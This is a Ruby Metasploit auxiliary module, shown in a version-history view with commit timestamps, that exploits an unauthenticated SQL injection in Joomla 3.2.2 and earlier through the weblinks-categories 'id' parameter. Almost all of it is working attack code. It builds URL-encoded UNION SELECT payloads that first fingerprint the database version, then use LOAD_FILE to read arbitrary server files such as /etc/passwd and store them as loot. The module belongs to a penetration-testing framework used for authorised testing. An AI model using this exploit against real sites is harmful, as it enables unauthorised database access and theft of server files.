metasploit-framework/modules/auxiliary/gather/joomla_weblinks_sqli.rb

108 lines
3.2 KiB
Ruby
Raw Normal View History

2014-03-12 17:46:56 +00:00
# This module requires Metasploit: http//metasploit.com/download
2014-03-13 00:47:39 +00:00
##
2014-03-12 17:46:56 +00:00
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Joomla weblinks-categories Unauthenticated SQL Injection Arbitrary File Read',
'Description' => %q{
Joomla versions 3.2.2 and below are vulnerable to an unauthenticated SQL injection
which allows an attacker to access the database or read arbitrary files as the
'mysql' user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Brandon Perry <bperry.volatile@gmail.com>', #metasploit module
],
'References' =>
[
2014-03-13 00:47:39 +00:00
['EDB', '31459']
2014-03-12 17:46:56 +00:00
],
'DisclosureDate' => 'Mar 2 2014'
))
register_options(
[
OptString.new('TARGETURI', [ true, "Base Joomla directory path", '/joomla']),
2014-03-13 00:47:39 +00:00
OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/passwd"]),
OptInt.new('CATEGORYID', [true, "The category ID to use in the SQL injection", 0])
2014-03-12 17:46:56 +00:00
], self.class)
end
2014-03-13 00:47:39 +00:00
def check
2014-03-13 01:11:55 +00:00
front_marker = Rex::Text.rand_text_alpha(6)
back_marker = Rex::Text.rand_text_alpha(6)
2014-03-13 00:47:39 +00:00
payload = datastore['CATEGORYID'].to_s
2014-03-13 01:11:55 +00:00
payload << "%29%20UNION%20ALL%20SELECT%20CONCAT%280x#{front_marker.unpack('H*')[0]}%2C"
payload << "IFNULL%28CAST%28VERSION%28%29%20"
payload << "AS%20CHAR%29%2C0x20%29%2C0x#{back_marker.unpack('H*')[0]}%29%23"
2014-03-13 00:47:39 +00:00
resp = send_request_cgi({
2014-03-13 13:55:15 +00:00
'uri' => normalize_uri(target_uri.path, 'index.php', 'weblinks-categories?id=' + payload)
2014-03-13 00:47:39 +00:00
})
if !resp or !resp.body
return Exploit::CheckCode::Safe
end
2014-03-13 01:11:55 +00:00
version = /#{front_marker}(.*)#{back_marker}/.match(resp.body)
2014-03-13 00:47:39 +00:00
if !version
return Exploit::CheckCode::Safe
end
2014-03-13 01:11:55 +00:00
version = version[1].gsub(front_marker, '').gsub(back_marker, '')
2014-03-13 00:47:39 +00:00
print_good("Fingerprinted: #{version}")
return Exploit::CheckCode::Vulnerable
end
2014-03-12 17:46:56 +00:00
def run
2014-03-13 01:11:55 +00:00
front_marker = Rex::Text.rand_text_alpha(6)
back_marker = Rex::Text.rand_text_alpha(6)
2014-03-12 17:46:56 +00:00
file = datastore['FILEPATH'].unpack("H*")[0]
2014-03-13 00:47:39 +00:00
catid = datastore['CATEGORYID']
payload = catid.to_s
2014-03-13 01:11:55 +00:00
payload << "%29%20UNION%20ALL%20SELECT%20CONCAT%280x#{front_marker.unpack('H*')[0]}"
payload << "%2CIFNULL%28CAST%28HEX%28LOAD_FILE%28"
payload << "0x#{file}%29%29%20AS%20CHAR%29%2C0x20%29%2C0x#{back_marker.unpack('H*')[0]}%29%23"
2014-03-13 00:47:39 +00:00
2014-03-12 17:46:56 +00:00
resp = send_request_cgi({
2014-03-13 13:55:15 +00:00
'uri' => normalize_uri(target_uri.path, 'index.php', 'weblinks-categories?id=' + payload)
2014-03-12 17:46:56 +00:00
})
if !resp or !resp.body
fail_with("Server did not respond in an expected way. Verify the IP address.")
end
2014-03-13 01:11:55 +00:00
file = /#{front_marker}(.*)#{back_marker}/.match(resp.body)
2014-03-12 17:46:56 +00:00
2014-03-13 00:47:39 +00:00
if !file
fail_with("Either the file didn't exist or the server has been patched.")
end
2014-03-13 01:11:55 +00:00
file = file[1].gsub(front_marker, '').gsub(back_marker, '')
2014-03-12 17:46:56 +00:00
file = [file].pack("H*")
path = store_loot("joomla.file", "text/plain", datastore['RHOST'], file, datastore['FILEPATH'])
if path and path != ''
print_good("File saved to: #{path}")
end
end
end